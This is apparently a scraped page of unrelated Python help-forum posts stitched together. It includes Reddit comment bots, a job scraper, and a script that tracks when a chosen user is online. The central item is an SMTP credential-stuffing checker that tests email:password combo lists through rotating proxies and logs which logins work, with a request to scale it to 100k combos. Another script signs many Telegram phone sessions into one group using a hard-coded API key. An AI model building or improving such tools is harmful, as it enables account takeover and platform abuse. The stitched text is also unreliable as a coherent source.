The console is giving a syntax error on line 2 at the end of the word print on the T.
The line by itself functions perfectly. Some of the code is left out as it contains account details but none of it is relevant to the problem.
def run_bot(posts_replied_to):
print ("Searching last 5 posts...")
for submission in praw.Reddit(username = "Sir_Hanush_of_Leipa",
password = "********",
client_id = "kbe2veBF1yE9mA",
client_secret = "*************",
user_agent = "******".subreddit("kingdomcome").new(limit=5)
if (submission.id) not in posts_replied_to :
print ('New post found: ' + submission.id)
submission.reply(random.choice(kingdom_quotes) + "\n\n___\n\nHalt!
I am ...")
print ("Replied to post " + submission.id)
posts_replied_to.append(submission.id)
with open ("posts_replied_to.txt", "a") as f:
f.write(submission.id + "\n")
#Pause for 1 minute
print("Sleeping for 10 minutes...")
time.sleep(600)
print ("Search Completed.")
print (posts_replied_to)
print("Sleeping for 10 minutes...")
time.sleep(600)
def get_saved_posts():
if not os.path.isfile("posts_replied_to.txt"):
posts_replied_to = []
else:
with open("posts_replied_to.txt", "r") as f:
posts_replied_to = f.read()
posts_replied_to = posts_replied_to.split("\n")
posts_replied_to = list(filter(None, posts_replied_to))
f.close()
return posts_replied_to
def login_ritual():
posts_replied_to = get_saved_posts()
print (posts_replied_to)
return posts_replied_to
while True:
posts_replied_to = login_ritual()
try:
run_bot(posts_replied_to)
except:
print(datetime.datetime.now())
print("Unable to execute. Trying again...")
It should use the Reddit API to get the post id and check it to see if the bot has already responded. But it gives a syntax error on the print function.
Edit: This is the error Command prompt gives
File "Kingdombot.py", line 30
print ('New post found: ' + submission.id)
^
SyntaxError: invalid syntax
Related
It only works if I have one user#domain.com:password line in accounts.txt
but as soon as i add more than one email:password lines it gives error, e.g
user1#first.com:password
user2#second.com:password
user3#third.com:password
user4#fourth.com:password
all gives error even if the emails are good or bad, so it's not authenticating.
If it's one line alone it authenticates / connects and tell if the email is good or bad
user1#first.com:password
It's only accurate to first line if only one combo is there but gives error to all as soon as I edit the txt and add more lines of combos
i want it to be able to connect and give connect or notconnect to more than one combolist up to 100k and more, guess there should be an array in the smtp server
Here's my code:
import smtplib
import socks
import codecs
import unicodedata
import random
from multiprocessing.pool import ThreadPool
# PROXY_TYPE_HTTP
# PROXY_TYPE_SOCKS5
proxy_type = socks.PROXY_TYPE_SOCKS5
use_proxies = False
thead_count = 1
use_encrpytion = False
accounts = []
accounts_checked = 0
accounts_valid = []
accounts_invalid = []
proxies = []
def check_account(email, password):
try:
if (use_proxies):
proxy = random.choice(proxies)
proxy_host = proxy.split(':')[0]
proxy_port = int(proxy.split(':')[1])
socks.setdefaultproxy(proxy_type, proxy_host, proxy_port)
socks.wrapmodule(smtplib)
mailserver = smtplib.SMTP("mail." + email[email.index('#') + 1 : ],587)
mailserver.ehlo()
if (use_encrpytion):
mailserver.starttls()
mailserver.login(str(email), str(password))
mailserver.quit()
return True
except smtplib.SMTPAuthenticationError:
return False
def get_status(account):
global accounts_checked, accounts
if (':' not in account):
return False
email = account.split(':')[0]
password = account.split(':')[1]
valid = check_account(email, password)
if (valid):
print("Valid: ", account)
f1 = open("connect.txt", "a+")
f1.write(account)
f1.close()
accounts_valid.append(account)
else:
f2 = open("not_connect.txt", "a+")
f2.write(account)
f2.close()
accounts_invalid.append(account)
accounts_checked += 1
print("(" + str(accounts_checked) + "/" + str(len(accounts)) + ")")
return valid
if __name__ == "__main__":
if (use_proxies):
print("Reading \"proxies.txt\"...")
with open("proxies.txt") as f:
for line in f:
if (':' in line):
proxies.append(line)
print("Found " + str(len(proxies)) + " proxies.")
print("Reading \"accounts.txt\"...")
with codecs.open("accounts.txt", encoding='utf-8') as f:
for line in f:
line = unicodedata.normalize('NFKD', line).encode('ascii','ignore').decode('ascii')
if (':' in line):
accounts.append(line.replace("\n", "").replace("\t", ""))
print("Found " + str(len(accounts)) + " accounts.")
print("Creating thread pool...")
pool = ThreadPool(thead_count)
results = pool.map(get_status, accounts)
pool.close()
pool.join()
print("Done checking, writing output...")
print("Completed!")
telethon.errors.rpcerrorlist.UserAlreadyParticipantError: The authenticated user is already a participant of the chat (caused by ImportChatInviteRequest)
my only request is for it to ignore and continue processing when i get this error
with open('numaralar.csv', 'r')as f:
str_list = [row[0] for row in csv.reader(f)]
po = 0
for pphone in str_list:
phone = utils.parse_phone(pphone)
po += 1
print(Style.BRIGHT + Fore.GREEN + f"Giriş {phone}")
client = TelegramClient(f"sessions/{phone}", 2392599, '7e14b38d250953c8c1e94fd7b2d63550')
client.connect()
if not client.is_user_authorized():
try:
client.send_code_request(pphone)
client.sing_in(pphone,input('Kodu Gir :'))
print('')
client.sign_in(pphone)
except SessionPasswordNeededError:
password = input('2fa Şifresini Gir: ')
print('')
client.sign_in(password=password)
except:
traceback.print_exc()
print(Style.BRIGHT + Fore.RED + f"fuatcim BUNLA ZATEN GİRMİSSİN AMK")
continue
gplink = 'qDPUgvuTiCliNzdk'
client(ImportChatInviteRequest(gplink))
print(Style.BRIGHT + Fore.GREEN + f"fuatcim gruba girdim askim")
I tried something like this but failed
how can i do something it seems easy but i am just starting to learn
The error message states that the error is caused by ImportChatInviteRequest()
so you have to surround that part with a try - except block.
try:
gplink = 'qDPUgvuTiCliNzdk'
client(ImportChatInviteRequest(gplink))
print(Style.BRIGHT + Fore.GREEN + f"fuatcim gruba girdim askim")
except:
pass # When there is an exception, do nothing
The first time the script is run with input userid and if the user is online, it runs fine until the print(f'{username}, {userid}' + ' is still online...') gets stuck.
The program never continues to the else: when the user go offline and while userid == str(ps['user_id']): is no longer True.
It's like the str(ps['user_id']): never updates in the script when called.
userid = input('Input userID: ')
response = requests.post('website.com/api', headers=headers, data=data)
json_data = json.dumps(response.json(), indent=2)
data = json.loads(json_data)
while True: # Main loop to run if a user is online
for ps in data['result']['page']['list']:
if userid == str(ps['user_id']): # If a user is online print details
username = ps['nick_name']
print('Username: ' + ps['nick_name'])
print('UserID: ' + str(ps['user_id']))
while userid == str(ps['user_id']): # Look if the user is still online (is in the json response)
print(f'{username}, {userid}' + ' is still online...')
time.sleep(3)
else: # If user go offline(is not in the json response), break and restart main loop(first while loop).
break
print('Waiting for ' + f'{userid}' + ' to get online...') # Message until user go online again (is found in the json response).
time.sleep(5)
You are not updating data anywhere inside of your loop so its using the same stale data for every iteration. You can just add your three lines to generate data into your loop before the time.sleep(5). This will give you updated data and should resolve your issue.
userid = input('Input userID: ')
response = requests.post('website.com/api', headers=headers, data=data)
json_data = json.dumps(response.json(), indent=2)
data = json.loads(json_data)
userList = data['result']['page']['list']
isOnline = 0
while True: # Main loop to run if a user is online
hasLoggedIn = 0
for user in userList:
if str(user['user_id']) == userid and isOnline == 0: # If a user is online print details
username = user['nick_name']
print('Username: ' + user['nick_name'])
print('UserID: ' + str(user['user_id']))
print(f'{username}, {userid}' + ' is now online...')
isOnline = 1
hasLoggedIn = 1
time.sleep(3)
elif str(user['user_id']) == userid and isOnline == 1:
print(f'{username}, {userid}' + ' is still online...')
hasLoggedIn = 1
time.sleep(3)
if hasLoggedIn == 0:
print('Waiting for ' + f'{userid}' + ' to get online...') # Message until user go online again (is found in the json response).
isOnline = 0
time.sleep(5)
response = requests.post('website.com/api', headers=headers, data=data)
json_data = json.dumps(response.json(), indent=2)
data = json.loads(json_data)
userList = data['result']['page']['list']
I have been trying to make a bot that searches for a specific keyword in the reddit title, if that keyword is true it would then comment something in that thread. Everything works find, just I have one problem, after around 4 hours of it running it keeps searching but it stops commenting for some reason, no idea why. Then I restart it and it works ok.
It seems to happen around 3pm PST everyday, it keeps on printing that it is searching but it just wont comment even if there are posts that contain the keywords. Is this somehting that reddit does to stop bots or is something wrong with my code.
Before I had the reddit praw statement ouside of my 3 subreddit functions, but I wanted to test if i kept on reconnecting to the prawl after every seach would it stop the issue.
In sort my reddit bot stops commenting after a certain point and is there any way I could fix this or is it permanent.
#!/usr/bin/python
import praw
import pdb
import re
import os
import threading
import time
sub1_array = ['Title']
sub1_array = ['Comment']
def sub1():
reddit = praw.Reddit('bot1')
if not os.path.isfile("posts_replied_to.txt"):
posts_replied_to = []
else:
with open("posts_replied_to.txt", "r") as f:
posts_replied_to = f.read()
posts_replied_to = posts_replied_to.split("\n")
posts_replied_to = list(filter(None, posts_replied_to))
subreddit = reddit.subreddit('sub1')
print("Checking sub1")
for submission in subreddit.new(limit=20):
i = 0
while i <= (len(sub1_array) - 1):
# If we haven't replied to this post before
if submission.id not in posts_replied_to:
# Do a case insensitive search
if re.search(sub1_array[i], submission.title, re.IGNORECASE):
# Reply to the post
submission.reply(link_array[i])
print("Bot replying to match: ", submission.title)
del sub1_array[i]
del sub1_array[i]
posts_replied_to.append(submission.id)
time.sleep(100)
else:
i += 1
else:
i += 1
with open("posts_replied_to.txt", "w") as f:
for post_id in posts_replied_to:
f.write(post_id + "\n")
sub2_array = ['Title']
sub2_link = ['Comment]
def sub2():
reddit = praw.Reddit('bot1')
if not os.path.isfile("posts_replied_to.txt"):
posts_replied_to = []
else:
with open("posts_replied_to.txt", "r") as f:
posts_replied_to = f.read()
posts_replied_to = posts_replied_to.split("\n")
posts_replied_to = list(filter(None, posts_replied_to))
subreddit = reddit.subreddit('sub2')
print("Checking Streams NBA")
for submission in subreddit.new(limit=20):
#print(submission.title)
i = 0
while i <= (len(sub2_array) - 1):
# If we haven't replied to this post before
if submission.id not in posts_replied_to:
# Do a case insensitive search
if re.search(sub2_array[i], submission.title, re.IGNORECASE):
# Reply to the post
submission.reply(sub2_link[i])
print("Bot replying to match: ", submission.title)
del sub2_array[i]
del sub2_array[i]
posts_replied_to.append(submission.id)
time.sleep(100)
else:
i += 1
else:
i += 1
with open("posts_replied_to.txt", "w") as f:
for post_id in posts_replied_to:
f.write(post_id + "\n")
sub3_array = ['Title']
sub3_link = ['Comment]
def ncaa():
reddit = praw.Reddit('bot1')
if not os.path.isfile("posts_replied_to.txt"):
posts_replied_to = []
else:
with open("posts_replied_to.txt", "r") as f:
posts_replied_to = f.read()
posts_replied_to = posts_replied_to.split("\n")
posts_replied_to = list(filter(None, posts_replied_to))
subreddit = reddit.subreddit('sub3')
print("Checking sub3")
for submission in subreddit.new(limit=20):
#print(submission.title)
i = 0
while i <= (len(sub3_array) - 1):
# If we haven't replied to this post before
if submission.id not in posts_replied_to:
# Do a case insensitive search
if re.search(sub3_array[i], submission.title, re.IGNORECASE):
# Reply to the post
submission.reply(sub3_link[i])
print("Bot replying to match: ", submission.title)
del sub3_array[i]
del sub3_array[i]
posts_replied_to.append(submission.id)
time.sleep(100)
else:
i += 1
else:
i += 1
with open("posts_replied_to.txt", "w") as f:
for post_id in posts_replied_to:
f.write(post_id + "\n")
def should_reset_timer():
pass
def main():
sub1()
sub2()
sub3()
timer = 0
while True:
time.sleep(1)
timer+=1
if should_reset_timer():
timer = 0
if timer == 1*30:
sub1()
sub2()
sub3()
timer = 0
# Store the current id into our list
# Write our updated list back to the file
main()
A friend and I created the following script utilizing BeautifulSoup to get the HTML of a job page, then append the job to an array, then a file, then email the job in a human-readable format to ourselves. The script works on Ubuntu, but on my Raspberry Pi, which uses Raspbian, it doesn't work.
The only message I see when running from the terminal is: 'end of file' and 'Start write...' which are lines in the code. There are no error messages when running from the Pi, but nothing gets appended to the array and no emails are sent.
Can someone take a look? Thanks.
import urllib2, email, smtplib, os.path
import cPickle as pickle
from bs4 import BeautifulSoup
class Job:
"""docstring for Job"""
def __init__(self, title, date, url):
self.title = title
self.date = date
self.url = "http://www.forensicfocus.com/"+url
def describJob(self):
return (self.title +" "+ self.date +" "+ self.url)
def createJobsArray():
soup = BeautifulSoup(urllib2.urlopen('http://www.forensicfocus.com/jobs').read())
bigFatString = soup.find_all('a')
#print(bigFatString) #this gets webpage as html. No issues here
findAll = soup.find_all("tr", class_="topic")
jobsArray = []
for section in findAll:
title = section.find("a", class_="topictitle").get_text()
titleEncoded = title.encode('ascii','ignore')
row = section.find_all("td")
date = row[3].find("div").get_text()
url = section.find_all("a")[3].get("href")
job = Job(titleEncoded, date, url)
print "printing job"
print job
print "printing job"
jobsArray.append(job)
return jobsArray
def sendEmail(job):
senderEmail = "sender#example.com"
recipients = ["destination#example.com"]
s = smtplib.SMTP("smtp.gmail.com",587)
s.ehlo()
s.starttls()
s.ehlo()
s.login(senderEmail, 'pass_goes_here')
for job in jobsFilteredByLocation:
msg = email.message_from_string(job.describJob())
msg['Subject'] = "New Job Found: " + job.title
s.sendmail(senderEmail, recipients, msg.as_string())
print "Sending email..."
s.quit()
def saveJobsToDisk(jobs):
with open('hadooken', 'wb') as output:
print "Start write..."
for job in jobs:
print job.title
pickle.dump(job, output)
output.close()
def getJobsFromDisk():
oldJobsArray = []
with open('hadooken', 'rb') as input:
while True:
try:
job = pickle.load(input)
print job.title, "was successfully read from file"
oldJobsArray.append(job)
except EOFError:
print "end of file"
break
return oldJobsArray
input.close()
# SCRIPT STARTS HERE
with open('hadooken', 'ab') as input:
input.close()
locationsArray = ["London"]
jobsArray = createJobsArray()
oldJobsArray = getJobsFromDisk()
jobsFilteredByLocation = []
for job in jobsArray:
for location in locationsArray:
found = job.title.find(location)
if found > 0:
if len(oldJobsArray) > 0:
if any(oldJob.title == job.title for oldJob in oldJobsArray):
print "Job previously found and sent..."
else:
print "adding ", job.title, "to array because it isnt in the old array"
jobsFilteredByLocation.append(job)
else:
print "adding ", job.title, "to array"
jobsFilteredByLocation.append(job)
sendEmail(jobsFilteredByLocation)
mergedArray = oldJobsArray + jobsFilteredByLocation
for job in mergedArray:
print "Job title: ", job.title
saveJobsToDisk(mergedArray)